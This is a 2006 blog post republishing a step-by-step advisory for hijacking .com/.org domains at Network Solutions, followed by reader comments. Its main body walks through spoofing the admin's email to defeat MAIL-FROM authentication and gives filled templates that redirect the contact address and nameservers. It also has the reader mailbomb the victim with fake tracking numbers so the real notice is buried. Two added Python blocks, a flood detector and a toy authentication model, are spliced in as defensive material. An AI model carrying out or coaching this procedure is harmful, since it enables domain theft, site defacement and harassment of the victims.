Darknet – Hacking Tools, Hacker News & Cyber Security


Domain Stealing or How to Hijack a Domain

September 20, 2006


Please note that this, again, is an old technique, presented for learning purposes only: learn how the old techniques worked and why they worked, then try to discover new ways to do things.

Summary

The sole purpose of the information contained in this advisory is to point out the flaws in InterNIC’s domain name handling system and is intended for educational use only. Since this is public knowledge, it should also be within everyone’s reach.

The technique described below involves an easy to follow procedure of stealing .com/.net/.org/.gov/.mil domain names.

This vulnerability has been publicly known for quite a while, and there are ways to prevent it. The procedure below enables an attacker to take over a domain name, enabling him or her to make the arbitrary web address (www.example.com) point to any desired web page on the Internet. This method of domain hijacking is constantly being used to hijack domain names, and to deface web sites.

THIS DOCUMENT SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY.

Details

Required ingredients:

  • Anonymous remailer or mail bomber that can spoof email addresses.
  • Social Engineering skills for timing the emails.
  • A fake email address at hotmail.com or any other free service.

Exploit:
As an example for this advisory, we will take the domain name example.org. Go to http://www.networksolutions.com and click on the link that says ‘Who Is.’ Now enter the domain name (example.org in this case) in the search field and click on the ‘Search’ button. This would show you the WhoIs information, which will be similar to the one shown below:

Registrant:
Example (ex24-DOM)
   Address details
 
   Domain Name: EXAMPLE.ORG
 
   Administrative Contact, Technical Contact, Zone Contact,
   Billing Contact:
      DOMAIN, ADMIN (ADM001) ADMINEMAIL@EXAMPLE.COM
 
 
   Record last updated on 00-Jan-2000.
   Record created on 00-Jan-2000.
   Database last updated on 3-Feb-2000 14:29:53 EST.
 
   Domain servers in listed order:
 
   NS1.EXAMPLE.COM 1.2.3.4
   NS2.EXAMPLE.NET 1.2.3.5

Now you have two choices:

1) Either you could take full control of the domain by changing the Administrator’s handle information.

Or

2) You could simply point the domain to another host and let it recover in time by itself.

Initiating the First Attack:

Let us first explain the InterNIC authentication system, since many readers will not have their own domain names. The problem with InterNIC authentication is that it does NOT send a confirmation email if the request is sent from the same email address as the person owning the contact or the domain name itself! Therefore, utilizing this flaw, one could spoof anyone’s email address and change any domain name’s information.

However, a confirmation is required from the person to whom the domain is about to be transferred, and that shouldn’t be too hard as it would be your own email address.

Here’s a step-by-step procedure:

  • Go to http://www.networksolutions.com/
  • Click on the link that says ‘Make Changes.’
  • Enter the domain name example.org
  • You should be presented with 2 blue buttons
  • Click on the one that says *Expert*
  • Next screen would have a heading ‘Select the form that meets your needs’
  • Click on the link that says ‘Contact Form’
  • Next you should see a form with 2 fields.
  • In the first field enter the admin’s handle (example.org admin is ADM001)
  • In the next field enter his/her email address (in this case it’s [email protected])
  • Change the option to ‘Modify.’
  • Now ‘Proceed to Contact Information.’
  • Select the MAIL-FROM option and click the ‘Go on to Contact Data Information.’
  • Now you should see all the information about the admin contact of the domain name!
  • In the E-mail address field change the email to your own fake email. (in this case it’s [email protected])
  • Now ‘Proceed to Set Authorization Scheme.’
  • Again choose MAIL-FROM and enter the email address of the admin ([email protected])
  • Leave the bottom option to ‘No’ and ‘Generate Contact Form.’

Now you should see a template with all the information. Similar to this:

******** Please DO NOT REMOVE Version Number ********
 
Contact Version Number: 1.0
 
******** Please see attached detailed instructions ********
 
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
 
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com
 
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
 
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO

NOTE: Do NOT press the button at the bottom that says ‘Mail this contact form to me!’

Copy and paste this message into your anonymous remailer or mailbomber and you are ready to go; but WAIT! It’s not that easy, now comes the HARD part! When you mail this message to [email protected] a message similar to the following would be sent to the admin email address:

Subject: [NIC-000128.4r50] Your Mail
______________________________________________________________
This is an automatic reply to acknowledge that your message has been received by hostmaster@networksolutions.com. This acknowledgement is "NOT" a confirmation that your request has been processed. You will be notified when it has been completed.
 
If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.
 
If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's:
 
   Domain Name Registration Service Agreement
      http://www.networksolutions.com/legal/service-agreement.html
   Domain Name Registration Template
      ftp://www.networksolutions.com/templates/domain-template.txt
 
Regards,
Network Solutions Registration Services
 
***********************************************
 
***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at
ftp://www.networksolutions.com/templates/domain-template.txt
for all template requests.
 
The terms and conditions of the Service Agreement are available on our Web site at: http://www.networksolutions.com/legal/service-agreement.html.
************************************************
 
The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.
 
Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant's address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.
 
To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is available on our Web site at www.networksolutions.com
 
To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net. This form is also available on our Web site.
 
Network Solutions Registration Services
e-mail: help@networksolutions.com

You should now be thinking that this message could get you in trouble, but there is a way of getting rid of this trouble. Here you’ll use your mailbomber to mailbomb the guy with 20-30 similar messages if you want your attack to be successful. The person would see 35 messages from the same address and therefore would delete all of them and you’d probably be safe. If he ‘would’ email someone then he would probably reply to the wrong tracking number. In the above case, the tracking number is [NIC-000128.4r50]. OK, here is another hard part. You have to open your notepad and generate similar numbers; you actually have to come up with them.

You should NEVER mailbomb the person with the same tracking number. What we mean is that you should never send more than one email to him with [NIC-000128.4r50]; in the next email, change the [NIC-000128.4r50] to [NIC-000127.5089] or something different. Here is a list of some numbers that we generated just to give you a good idea of how the scheme works.

[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]

Remember to change the number at both places. In the subject as well as the email body!

In the case of example.org you will send the email messages to [email protected] from [email protected]. The message subject and body are already described above.

Stop after you have mailed him/her 10-15 messages! Now it’s time to email [email protected] with our fake email as [email protected] So again, in this case the message will be sent to [email protected] from [email protected] with the following template that we created above:

******** Please DO NOT REMOVE Version Number ********
 
Contact Version Number: 1.0
 
******** Please see attached detailed instructions ********
 
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
 
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com
 
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
 
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO

NOTE: Do NOT put anything in the Subject!

Just send one email! DO NOT bomb [email protected] with more than one email. That’s pretty much it. Now continue to bomb [email protected], changing the tracking number every time until your 30-35 tracking numbers are used up!

Now all you have to do is wait. After 24 hours you could go and change the domain information and no one would be there to stop you because now you are the admin of the domain name!

NOTE: This attack will only work on domains that have an admin contact different from their technical contact!

Initiating the Second Attack:

This attack will be successful even if the technical and admin contact are the same.
The procedure is basically the same apart from the fact that this time:

  • Go to http://www.networksolutions.com/
  • Click on the link that says ‘Make Changes.’
  • Enter the domain name example.org
  • You should be presented with 2 blue buttons
  • Click on the one that says *Expert*
  • Next screen would have a heading ‘Select the form that meets your needs’
  • Click on the link that says ‘Service Agreement.’
  • Now when it asks for email address, enter your own.
  • Now you should see many fields, don’t panic!
  • Go to the technical contact and change the handle to freeservers, hypermart, etc.
  • Now come to ‘Nameserver Information.’
  • Change the nameservers to hypermart or freeserver nameservers.
  • If there’s anything in the ‘Optional Information’ after that then simply delete them.
  • Click on the button ‘Submit this form for processing.’

You are done, the form will be emailed to your email address. When the form arrives in your email, then simply take this part:

**** PLEASE DO NOT REMOVE Version Number or any of the information below when submitting this template to hostmaster@networksolutions.com. *****
 
Domain Version Number: 5.0
 
******** Email completed agreement to hostmaster@networksolutions.com ********
 
 
AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s) through our online application process or by applying for and registering a domain name as part of our e-mail template application process or by using the service(s) provided by Network Solutions under the Service Agreement, Version 5.0, you acknowledge that you have read and agree to be bound by all terms and conditions of this Agreement and any pertinent rules or policies that are or may be published by Network Solutions.
 
Please find the Network Solutions Service Agreement, Version 5.0 located at the URL http://www.networksolutions.com/legal/service-agreement.html.
 
 
[ URL ftp://www.networksolutions.com ] [11/99]
 
Authorization
0a. (N)ew (M)odify (D)elete.........: M Name Registration
0b. Auth Scheme.....................: MAIL-FROM
0c. Auth Info.......................:
 
1. Comments........................:
 
2. Complete Domain Name............: example.org
 
Organization Using Domain Name
3a. Organization Name................: EXAMPLE
3b. Street Address..................:
3c. City............................:
3d. State...........................:
3e. Postal Code.....................:
3f. Country.........................:
 
Administrative Contact
4a. NIC Handle (if known)...........: ADM001
4b. (I)ndividual (R)ole?............: Individual
4c. Name (Last, First)..............:
4d. Organization Name...............:
4e. Street Address..................:
4f. City............................:
4g. State...........................:
4h. Postal Code.....................:
4i. Country.........................:
4j. Phone Number....................:
4k. Fax Number......................:
4l. E-Mailbox.......................:
 
Technical Contact
5a. NIC Handle (if known)...........: BDM002
5b. (I)ndividual (R)ole?............: Individual
5c. Name(Last, First)...............:
5d. Organization Name...............:
5e. Street Address..................:
5f. City............................:
5g. State...........................:
5h. Postal Code.....................:
5i. Country.........................:
5j. Phone Number....................:
5k. Fax Number......................:
5l. E-Mailbox.......................:
 
Billing Contact
6a. NIC Handle (if known)...........: ADM001
6b. (I)ndividual (R)ole?............: Individual
6c. Name (Last, First)..............:
6d. Organization Name...............:
6e. Street Address..................:
6f. City............................:
6g. State...........................:
6h. Postal Code.....................:
6i. Country.........................:
6j. Phone Number....................:
6k. Fax Number......................:
6l. E-Mailbox.......................:
 
Prime Name Server
7a. Primary Server Hostname.........: NS1.EXAMPLE.COM
7b. Primary Server Netaddress.......: 1.2.3.4
 
Secondary Name Server(s)
8a. Secondary Server Hostname.......: NS2.EXAMPLE.NET
8b. Secondary Server Netaddress.....: 1.2.3.5
 
END OF AGREEMENT
 
For instructions, please refer to:
"http://www.networksolutions.com/help/inst-mod.html"

Now launch your anonymous remailer or mailbomber.

  • From: the domain admin ([email protected] in this case).
  • To: [email protected]
  • Subject: (do not enter any subject, leave the field blank!)
  • Body: the template you created above.
  • You are ready to go but before you send this email to InterNIC, remember to bomb [email protected] with similar emails but different tracking numbers as we did in the first procedure.
  • After sending 10-20 emails, send the above template to InterNIC.
  • Continue bombing your 40 messages. Remember to generate 40-50 tracking numbers.
    This is basically it.
  • The domain would be transferred to freeservers or hypermart and then you could simply activate it from there on your own email address. Remember to use a fake email.

Nameservers and Handles:

Freeservers Technical Handle: FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154

Hypermart Technical Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66
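
Both procedures depend on the registrar's one real acknowledgement being buried under look-alike messages with invented tracking numbers. The following added example (not part of the original advisory) is a mailbox-side check for that pattern; the function names, the one-hour window, the threshold of five and the tracking number NIC-000120.1a2b are assumptions made for the illustration.

```python
import re
from datetime import datetime, timedelta

# Tracking-number shape taken from the advisory's samples, e.g. [NIC-000128.4r50].
TRACKING_RE = re.compile(r"\[(NIC-\d+\.[0-9a-z]+)\]", re.IGNORECASE)


def unexpected_acks(messages, expected_ids=()):
    """Return sorted (time, tracking_id) pairs for acks the admin did not request."""
    expected = {tid.upper() for tid in expected_ids}
    found = []
    for when, subject in messages:
        match = TRACKING_RE.search(subject)
        if match and match.group(1).upper() not in expected:
            found.append((when, match.group(1).upper()))
    return sorted(found)


def detect_ack_flood(messages, expected_ids=(), window=timedelta(hours=1), threshold=5):
    """Classify the mailbox: None, 'unexpected' (a few acks) or 'flood' (a burst)."""
    acks = unexpected_acks(messages, expected_ids)
    if not acks:
        return {"severity": None, "ids": []}
    best_ids = set()
    start = 0
    for end in range(len(acks)):
        # Slide the window so it never spans more than `window` of time.
        while acks[end][0] - acks[start][0] > window:
            start += 1
        ids = {tid for _, tid in acks[start:end + 1]}
        if len(ids) > len(best_ids):
            best_ids = ids
    severity = "flood" if len(best_ids) >= threshold else "unexpected"
    return {"severity": severity, "ids": sorted(best_ids)}


# Constructed mailbox: (received time, subject). The first entry stands for a
# change the admin really submitted; the burst reuses numbers listed above.
_T0 = datetime(2000, 2, 3, 14, 0)
SAMPLE_MAILBOX = [
    (_T0 - timedelta(days=1), "[NIC-000120.1a2b] Your Mail"),
    (_T0, "[NIC-000128.4r50] Your Mail"),
    (_T0 + timedelta(minutes=2), "[NIC-000127.5089] Your Mail"),
    (_T0 + timedelta(minutes=4), "[NIC-000128.4rg7] Your Mail"),
    (_T0 + timedelta(minutes=5), "Re: lunch on Friday"),
    (_T0 + timedelta(minutes=7), "[NIC-000128.523f] Your Mail"),
    (_T0 + timedelta(minutes=9), "[NIC-000127.53d0] Your Mail"),
    (_T0 + timedelta(minutes=12), "[NIC-000129.r609] Your Mail"),
]

if __name__ == "__main__":
    result = detect_ack_flood(SAMPLE_MAILBOX, expected_ids={"NIC-000120.1a2b"})
    print(result["severity"], len(result["ids"]), "tracking numbers to verify")
```

A flood result is a prompt to check the domain's contact and nameserver records with the registrar directly, because any one of the listed numbers may belong to a real pending change.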

______________________________________________________________

Possible Fixes:

Enable the CRYPT-PW password mechanism. This should prevent anyone without this password from changing your domain information (see the InterNIC contact form for more information).
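
Why MAIL-FROM fails and a password scheme does not, as an added example that is not part of the original advisory and not the registrar's code: a toy model of the registrar-side check for the flaw described under "Initiating the First Attack" and the fix above. The record layout, function names, the address hostmaster@registrar.example and the use of salted PBKDF2 in place of the era's crypt(3) hash are assumptions.

```python
import hashlib
import hmac
import os
import re
from email import message_from_string
from email.utils import parseaddr

# Matches template lines such as "0b. Auth Scheme.............: MAIL-FROM".
FIELD_RE = re.compile(r"^\s*(\d+[a-z])\.\s[^:]*:\s*(.*)$")


def parse_template(body):
    """Map field ids ('0a', '0c', '1l', ...) to their stripped values."""
    fields = {}
    for line in body.splitlines():
        match = FIELD_RE.match(line)
        if match:
            fields[match.group(1)] = match.group(2).strip()
    return fields


def _hash(password, salt):
    # Assumption: salted PBKDF2-HMAC-SHA256 stands in for the original hash.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_contact(email, scheme, password=None):
    """Registrar-side record for one contact handle (hypothetical structure)."""
    record = {"email": email.lower(), "scheme": scheme}
    if scheme == "CRYPT-PW":
        record["salt"] = os.urandom(16)
        record["pw_hash"] = _hash(password, record["salt"])
    return record


def authorize(contact, raw_message):
    """Decide whether a modify request may change this contact."""
    msg = message_from_string(raw_message)
    sender = parseaddr(msg.get("From", ""))[1].lower()
    fields = parse_template(msg.get_payload())
    # The stored scheme decides; field 0b of the request is never trusted.
    if contact["scheme"] == "MAIL-FROM":
        # The only evidence is a header that the sender writes.
        return sender == contact["email"]
    if contact["scheme"] == "CRYPT-PW":
        supplied = fields.get("0c", "")
        if not supplied:
            return False
        return hmac.compare_digest(_hash(supplied, contact["salt"]), contact["pw_hash"])
    return False


def build_request(from_addr, scheme, auth_info, mailbox):
    """Constructed modify request using the advisory's placeholder values."""
    return (
        f"From: {from_addr}\n"
        "To: hostmaster@registrar.example\n"
        "\n"
        "Contact Version Number: 1.0\n"
        "0a. (N)ew (M)odify (D)elete.: Modify\n"
        f"0b. Auth Scheme.............: {scheme}\n"
        f"0c. Auth Info...............: {auth_info}\n"
        "1a. NIC Handle..............: ADM001\n"
        f"1l. E-Mailbox...............: {mailbox}\n"
    )


ADMIN = "ADMINEMAIL@EXAMPLE.COM"
SPOOFED = build_request(ADMIN, "MAIL-FROM", "", "evil@domain.com")
GENUINE = build_request(ADMIN, "CRYPT-PW", "constructed-passphrase", ADMIN)
WEAK = make_contact(ADMIN, "MAIL-FROM")
HARDENED = make_contact(ADMIN, "CRYPT-PW", "constructed-passphrase")

if __name__ == "__main__":
    print("MAIL-FROM accepts spoofed From:", authorize(WEAK, SPOOFED))
    print("CRYPT-PW accepts spoofed From:", authorize(HARDENED, SPOOFED))
    print("CRYPT-PW accepts genuine request:", authorize(HARDENED, GENUINE))
```

In this model the password in field 0c travels inside an ordinary e-mail, so it stops header spoofing but not someone who can read the message in transit.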

Originally By Lucifer Mirza aka Bufferman – Updated by Darknet.


Filed Under: Networking Hacking Tools, Social Engineering




Comments

  1. hobot says

    September 20, 2006 at 9:19 pm

    Oh snap.

  2. Tyler says

    October 7, 2006 at 7:08 pm

    thanks to whoever wrote this, very informative

  3. sirhackypants says

    November 1, 2006 at 8:51 pm

    SO you guys pulled a quick one with this thanks a lot!

  4. Needhelp says

    November 13, 2006 at 5:50 pm

    Help needed on how to take back a domain name which was used by someone who impersonated our company and stealing away all our clients. Please reply.

  5. Roger Wray says

    May 20, 2007 at 1:37 pm

    Telling about how a hijacking is done only serves to give information to those that want to hijack. I only wanted to know how to stop the hijacking. This article is by someone that is in the hijacking business and wants everyone to know how to do it.

  6. Daniel says

    June 4, 2007 at 8:57 am

    THIS DOCUMENT SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY.

    haha okay I’ll hack my own domains. yeah

  7. sayeed says

    July 2, 2007 at 8:55 am

    Hey buddies, I can’t find the “make changes” link in http://www.networksolutions.com . Please help me out !!!!

  8. lyz says

    August 15, 2008 at 12:45 pm

    Yeah. You can play with your own domains just to check the weakness of some applications nowadays.

  9. Navin says

    August 15, 2008 at 5:58 pm

    @ daniel….tht’s wht U’re expected to do…or for Ure clients (who’ve already been informed of these tests being carried out)…..”ETHICAL” hacking remember??

  10. lyz says

    August 16, 2008 at 5:34 am

    and that is the reason why we are all here. To learn.

  11. Morgan Storey says

    August 16, 2008 at 7:49 am

    Heh, Microsoft opened their servers to “pen testing” so have at them. Of course sharpen your skills then let them know or just do this on your own domains to find weaknesses.
